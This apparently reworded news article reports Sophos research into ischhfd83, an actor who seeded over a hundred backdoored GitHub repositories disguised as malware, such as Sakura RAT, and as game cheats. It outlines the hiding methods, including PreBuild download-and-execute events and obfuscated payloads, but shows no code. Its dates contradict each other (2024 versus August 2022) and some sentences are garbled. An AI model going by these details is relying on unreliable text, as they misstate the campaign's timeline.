Skip to content
technologyCybersecurityCameras

Malicious traders: Cybercriminals deceive their peers with counterfeit malware and unlawful gaming enhancements

Continuing to seek malware and game cheats remains a constant danger due to potential security breaches and unsavory consequences.

 and  Administrator
3 min read
Continuing to search for malware and game cheats will invariably expose one to potential risks at...
Continuing to search for malware and game cheats will invariably expose one to potential risks at all times.

Malicious traders: Cybercriminals deceive their peers with counterfeit malware and unlawful gaming enhancements

In the cutthroat digital world, Sophos security researchers have exposed a major hacking scheme that takes the cake - literally going after other hackers, and even gaming cheaters. This scoop came to light when a customer wondered if Sophos' security suite could safeguard against a piece of malware called Sakura RAT found on GitHub, with hype about its "advanced evasion techniques."

Sophos quickly detected that Sakura RAT, for all its rumored greatness, is more of a dud for the average Joe; it's only dangerous to those concocting it or yearning to unleash it on unsuspecting victims. Essentially, it's a trojaned trojan!

A Coded Confusion

"In simple terms, Sakura RAT has been compromised," Sophos explains.

The Sakura RAT itself isn't particularly special, with most of its code swiped from a popular RAT called AsyncRAT. What's more, many of its components remain empty, ensuring it wouldn’t even boot up properly on the target device, like an under-seasoned souffle!

However, this Trojan was just the first course in a convoluted digital meal of deception, layered infection chains, and a series of backdoor variants. The mastermind (or minds) behind Sakura RAT, alias ischhfd83, churned out over a hundred backdoored malware variants, each crafted to ensnare naive cyber-Marley's and gaming Grinches hunting for tricks or cheats.

Join Our Elite Circle

Subscribe to our Pro newsletter to stay on top of the game! You'll get the latest insights, expert opinions, exclusive features, and vital advice to help your business thrive!

In total, Sophos identified 141 GitHub repositories connected to ischhfd83, with a whopping 133 containing hidden backdoors. Most of these repositories were disguised as game cheats (58%), malware projects (24%), bots (7%), crypto tools (5%), or miscellaneous tools (6%).

The campaign seems to have first reared its head in 2024, suggesting the grand prize was targeting greenhorn threat actors because skilled players would likely subject new projects to a sandbox playground before jumping in, and quickly discerned that the vast majority of interactions were handled by bots with eerily similar names.

The operation's attribution remains ambiguous, but Sophos confirmed that it was a success.

It's Not All Bad News

  • This newly surfaced phishing trick exploits GitHub comments to distribute malware
  • Check out our guide to the top-rated authenticator app
  • We've handpicked the best password managers to suit your needs

Behind the Scenes:

Sophos researchers discovered a massive operation involving over 100 backdoored GitHub projects created by a single threat actor profile, ischhfd83. Upon analyzing Sakura RAT, the team found it to be largely ineffectual and posed minimal risk to regular users. Instead, the project had been tampered with to specifically target individuals attempting to compile or distribute the code, primarily inexperienced cybercriminals and gamers searching for cheats or exploits.

The backdoor mechanism involved a Visual Studio PreBuild event that would download and execute malware on the compilers' machines, potentially compromising would-be attackers' systems. Ischhfd83 was found to have connections to at least 141 GitHub repositories, with 133 confirmed to have hidden backdoors. These backdoors employed a variety of methods: obfuscated Python payloads, malicious screensaver (.scr) files utilizing Unicode tricks, and encoded JavaScript files. Many of these repositories were disguised as malware, hacking tools, or game cheats to trick users into unwittingly downloading and executing the harmful code.

The campaign has been ongoing since at least August 2022 and appears to prey on the inexperience of new threat actors and gaming cheaters, making use of the open-source platform's reputation to spread malware. Sophos reported their findings to GitHub, resulting in the takedown of most active repositories and malicious paste sites associated with the operation.

Cliff's Notes:

  • Damage: Over 100 backdoored GitHub projects linked to a single actor, ischhfd83.
  • Targets: Novice cybercriminals, hackers, game cheaters, and researchers seeking exploits or cheats.
  • Tricks: Visual Studio PreBuild events, obfuscated payloads, malicious screensaver files.
  • Threat: Remote access and infection of users who compile or execute the code.
  • Duration: Operation active since at least August 2022.
  • Action: Sophos reported findings to GitHub, resulting in takedown of most malicious content.

"Sophos researchers discovered that the malware known as Sakura RAT, although initially touted for its advanced capabilities, poses minimal risk to regular users. Instead, it's a targeted attack aimed at individuals compiling or distributing the code, often novice cybercriminals, hackers, and gaming cheaters."

"In the course of this operation, Sophos also observed the use of technology such as Visual Studio PreBuild events, obfuscated Python payloads, malicious screensaver files, and encoded JavaScript files, all hidden within repositories disguised as malware, hacking tools, or game cheats on GitHub."

Read also:

    Related

    Latest